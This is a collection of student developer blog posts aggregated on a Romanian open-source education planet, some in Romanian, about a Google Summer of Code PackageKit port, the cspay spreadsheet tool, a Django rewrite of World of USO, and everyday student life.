At the end of the week, preparing the next point of focus, I have managed to get a developing environment with PackageKit with Python gobject introspection data. Here comes the bad news: the py GI for packagekit is not ready for prime time. Reasons for that: GI is relatively new, there are no other users of PK from Python (only C and Vala). With help from ximion, hughsie, dantti and tomeu (and many other kind souls on #PackageKit, #introspection or #python), we isolated the problem inside pygobject, apparently an incomplete implementation of GPtrArray. I hope to get it fixed next week , so that I can continue work with PK.
Although I am a bit worried seeing segfaults in Python, it’s a sunny day out here (so I can finish my report on a non-technical note) so I’m sure that with help from these awesome people on IRC, problem will be solved, and my project will continue according to the plan.
Next week: gi ninja and more PK!
de Alex Eftimie la 04 June 2011 06:02 AM
27 May 2011
Not much to say about this first week of gsoc (Exams period hasn’t finished yet), so here it comes:
- had an IRC meeting with mentor vuntz of openSUSE and mvo of Ubuntu (the initial software-center author), got some things cleared up and planned the development
- according to my timeline, I now have the trunk version of software-center running in Debian wheezy; there is still work to do, but is an encouraging start;
next:
- work on a dummy install backend and a dummy package info provider; probably create an elegant way of switching backends;
other stuff:
- got interviewed for the openSUSE news
This is it. See you next week.
de Alex Eftimie la 27 May 2011 04:16 PM
05 May 2011
Hi everyone,
Just a quick announce that I will be working this summer as a GSoC student, for the openSUSE Project. My mentor will be Vincent Untz, the so called “father of GNOME 3″
What I’m aiming to do is modify Ubuntu Software Center to use PackageKit (an universal package management toolkit) as a installation backend, and also integrate it with the AppStream initiative (a cross-distro project for making software installation easier).
My full proposal can be read here (fixed). Feedback and suggestions are, as always, appreciated.
I would like to thank ROSEdu (which I am a member of) for the support
de Alex Eftimie la 05 May 2011 06:51 AM
12 February 2010
Acum că a trecut și penultima sesiune din ultimul an de facultate, iată sunt cele două proiecte la care am lucrat în timpul liber; care timp deși nu a fost mult, a existat (C3 nu e așa de crimă pe cât mă așteptam, myth busted).
Primul este unul personal, are legătură și cu lucrarea de licență, deocamdată nu public cod, spun doar că se prevede o aplicație măricică Python construită peste o bază de date SQLite, folosind sqlobject, GTK+, goocanvas, reportlab și mulți alți clopoței și fluierași. Am ajuns să fac – printre altele – widgets (prietenii știu de ce spun asta), și sper ca pe măsură ce o dezvolt să mă familiarizez cu aceste tehnologii. E o provocare să o construiesc și să o dezvolt și totodată o distracție.
Cel de al doilea proiect căruia i-am acordat mai mult timp în ultima perioadă, este portarea World of USO din PHP în Python – Django. Am luat alături de Vlad și Sergiu această decizie, deoarece nu eram mulțumiți de starea codului actual al WoUSO (prea multe contribuții de la persoane diferite, stiluri și abordări diferite); ca să rezum, era greu de dus mai departe, îmbunătățit. De ce Django? Pentru că Django e fun, prea multă lume l-a vorbit de bine ca să nu-l încercăm. L-am încercat și a dat roade: în două săptămâni am reușit să implementez o versiune de bază care acoperă aproape trei sferturi din funcționalitatea jocului. Tocmai am primit mail de la Vlad(um), este dispus să aloce timp, cred că vom face treabă bună în continuare .
WoUSO este unul dintre proiectele propuse pentru dezvoltare echipelor la Cursul de Dezvoltare Liberă. Mai multe detalii vor fi publicate pe site-ul cursului. Pot doar să lansez doar un zvon că s-ar putea să lucrăm la un modul WoUSO pe acel site care începe cu feis și se termină cu buc.
Dacă citești aici și te interesează unul dintre django, python sau wouso, nu fi timid, dă un mail. Ne-ar plăcea să te alături echipei .
Cam atât. Programming must be fun. Sunt limbaje precum chitonul care fac programarea frumoasă, părerea mea.
Links:
http://dev.rosedu.org/wouso/wiki/DjangoPort
http://wouso-django.rosedu.org/ (cont alex:alex)
de Alex Eftimie la 12 February 2010 07:56 PM
11 November 2007
I got rejected for Google Summer of Code, but that was to be expected. As easy as Plan 9 is and as much as I loved working with it at the beginning, such matters ar too serious to be covered within a week. Perhaps next year I will be better prepared in a field; I would of course like to try my hand at it again.
But Razvan (my Operating System Usage teacher in the first semmester) came up with a proposal to write a system that generates spreadsheets for hourly paid course assistants in our faculty. I naturally agreed and a team was quickly formed. We met today for the first time. While the project itself doesn’t sound like much, we decided to do it properly. We are using Razvan’s server for the entire development process (I got a new IMAP email address courtesy of him), including mailing lists, RCS (to be decided), web page, wiki and testing.
Everyone is very excited and we’ve already outlined a brief design: a C library for reading a configuration file and actually outputting the spreadsheets, a (probably PHP, which I’m not happy about) web interface, a minimal, console based program, which will be called by the web interface, and classic, offline programs for both Windows and Linux. We are considering GTK or wxWidgets. The latter looks better, but I’m reluctant to use C++ and it has no C bindings. The spreadsheets will be XML-based, using ODF and Open Office XML, but we’re planning to keep the config file simple (no XML, as parsing it would probably be harder than generating the documents).
For the moment, we still need to find a name, although a mailing list is in place. A wiki and versioning system will follow. I’ve chosen to read up on creating dynamic libraried and to think of the configuration and console program format. Razvan also suggested using a lexer, which is an entirely new concept to me (actually it was until a couple of hours ago).
Amazing how much a little planning can save; we probably would have switched ideas a lot of times and still wouldn’t have come up with a design close to this one. Still, as good as it seems, it will probably be subject to change once coding gets off the ground.

de Vlad Dogaru la 11 November 2007 12:10 PM
We now have a name for the previously-unnamed-project — cspay. I prefer not to capitalize it, although some of my friends write it as CSpay or CSPay. The meeting today was fruitful and quite fun, with delightfully opposing opinions between the C guys (me, Razvan and Luci) and PHP folks (Alex and Mihai). Roxi and Andrei (andrew, whatever…) took a strategically quiet position, probably snickering at our endless quarrels. However, had we agreed on things from the start, it would surely have been a wrong design; hence the long discussion about the inner workings of our project were beneficial, or so I like to believe.
I got the task of designing a structure that represents a spreadsheet, and then writing the lowest of the libraries, converting that structure to an XML file. Not a particularly challenging task, algorithmically speaking, but interesting nevertheless. After the aforementioned hour-long discussion, we settled that the PHP scripts would also read the master cinfiguration file. Thus, we will write code that does the same thing twice: in PHP and in C. I’m not quite happy about that, but the alternative was getting really complicated; not complex, but complicated. And that I want to stay away from.
Once the name had been decided, Mihai wrote a simple and suprisingly functional IMO sketch, and Razvan quickly provided the space for it and a development wiki. Things are getting going, with most of the initial setup in place, save for a RCS. But we haven’t written any code yet (and will not do so at least for another week probably), so that is a non-issue.
We found an ini parser for C, there is a link for one in PHP on the wiki, so we are looking towards simple ini file for the configuration. We also found xmlindent, which is unmaintained (apparently died at 0.2.17 a couple of years ago), but functional and useful; we are thinking of adopting or perhaps forking the project as a side-task, maybe on the long run.
Things are exciting, and I hope they will stay that way — I am close to the usual “screw it all” phase of any project I start working on, but hopefully everyone will motivate each other.

de Vlad Dogaru la 11 November 2007 12:09 PM
Because cspay planning is advancing steadily (or so it seems to me), Razvan installed Subversion. It proved to be quite tricky though. It’s probably a security measure, but a “plain” Subversion repository (in that just a plain svn create was run) cannot handle multiple users. So we spent about two days experimenting with it, until Razvan finally set the right permissions for the folder (his time is even more limited than ours, obviously). I wrote a quick post-commit email notify bash script (wow, suprisingly, I could do that); all that remains right now is to actually start coding; I should write the base for libspreadconv, the bottom library which creates an OpenOffice XML spreadsheet from a generic structure (which should be decided upon). There is a lot of reading to be done, and quite little time, with late mid-terms and all.
Exciting, yes. Tiresome, you bet.

de Vlad Dogaru la 11 November 2007 12:09 PM
I actually wrote my first lines of code for cspay these days, but they were mere headers for the library I am writing. I started reading parts of the standard and making a rough sketch of what will have to be included in an ods file; the standard is huge, but hopefully things can be simplified to a bare minimum, stock proto-spreadsheet. I am having difficulties deciding what to take for granted and what to expect from the user. libspreadconv has to strike a balance between being easy to use and widely applicable; so, while we have to be able to customise styles, they shouldn’t have to be specified if one wants a plain sheet. I will probably ask my friends for help on the mailing list.
In a totally different direction, I took part in some student things which I can’t really translate in English. One for Physics, about the quantity of information transmitted by measurements (again, translation may have ruined the meaning), and in Mathematics, about the coding of information by neuronal spike trains. The latter was slightly more interesting, but we only had to do a translation — and the professor practically forced it down our throats, but all in all both events were useful and failry exciting (intellectually, mind you).
I also helped RobyC with a very interesting piece of homework: compressing a bmp file into jpeg. Most of the program was already done, including the headers and file input and output, all we had to do was encode the information. This proved difficult because of not having read the homework specification thoroughly enough. We spent hours debugging, with hex editors and all, only to have someone suggest a detail which we had left out. Infinitely stressing, especially since I had an exam the following day, but also very interesting; you kind of get that warm feeling of accomplishment when you see it’s actually a stadards-compliant jpeg file.
Busy as I was, I got into some serious Armagetron Advanced with the boys these days, causing me to see coloured walls in my sleep and to miss this mornings Data Structures course, which I heard was surprisingly interesting. Heading home tomorrow, with that guilty feeling of leaving Roxi behind and skipping two days of school, but also happy I’ll finally get to see my family (6 weeks is apparently quite a lot by my standards). I’ll have a lot of work to do for Numerical Methods and other projects when I return, but I have to get it over with somehow.
Damn anal wordpress added extra line breaks and my text (pasted from vim) looked like shite.

de Vlad Dogaru la 11 November 2007 12:09 PM
I took advantage of the upcoming exam in Data Structures (I didn’t study for this one) to get some work done on my part of cspay. Libspreadconv is the part that converts a data structure (which I have defined) into an ods spreadsheet. The current implementation is incomplete (even the final version will be incomplete, but this is a subset of the subset) and probably extremely buggy — I can’t read valgrind output, but it does say that a lot of bytes have been lost and this can’t be good. I’m starting to have second thoughts about the way I’ve implemented certain things, so I should probably change them while the library is still not used by anyone. I also want to learn a bit of valgrind and clean up things. Bottom line: the current version is sloppy, slow, buggy and incomplete, but it was quite amazing to run the output through a validator, see it turned out ok, then to actually witness OpenOffice.org display what I intended.
A large part of the code I wrote is actually comments, but I like the way Doxygen spat them out. Right now, however, I have a (repeating myself) small, sloppy library with few routines and clumsy comments. But it’s a start. I think.
I’ve also been playing a game these days — the Romanian equivalent of TribalWars[1]. Sure it’s silly and time-consuming, but right now I _have_ time. When things change (or the game gets harder), I’ll probably quit, like I did with Utopia and the Blue Gecko games.
[1] http://www.triburile.ro/43827.html

de Vlad Dogaru la 11 November 2007 12:09 PM
10 November 2007
Things have been busy lately and I haven’t really been in the mood to blog. A quick recap of what I can remember:
- wrote a small part of World of USO (in Romanian, not open to the public). This was awesome — using C and flex to parse some data and then update a MySQL table. World of USO is educational software integrated with Moodle, but it’s really very closely linked to the “Usage of Operating Systems” course I had last year (approximate translation).
- got my driver’s license. Hate every single moment while driving. Luckily I don’t own or need a car.
- school started. Electronics is a pain, but otherwise things are all interesting. Assembly, Java, algorithm analysis, systems theory and electronics pretty much sums it up. Philosophy is the odd one and it’s nothing like it should be.
- helped Răzvan with organising ACM 2007 Easter Europe contest. Things were insane — interesting people and new challenges.
- trying to learn Haskell. It’s above all other programming languages I’ve seen. Simple, but far from easy.
- starting Hammerfall (working title, partly Romanian, might not be online at the time of this writing). It’s an attempt for a graphic engine based on OpenGL; after finishing it, we pan a game. Things are now very uncertain — we don’t even know what language we will use.
- almost forgot: cspay is fully working; a lot of work from Lucian got us spitting out xls files. Sure, it probably still has bugs, but things are pretty much on track with cspay.
- Rosedu is getting things moving — freshmen joining, new project ideas, a facelift for the website, new forums, Planet Rosedu. The latter is an awesome idea. Be warned that most of the content on Rosedu is in Romanian and we intend to keep it that — only the software will (hopefully) be in English. Rosedu is education-, FLOSS-, and Romania-oriented. The latter speaks for itself.

de Vlad Dogaru la 10 November 2007 01:49 PM
|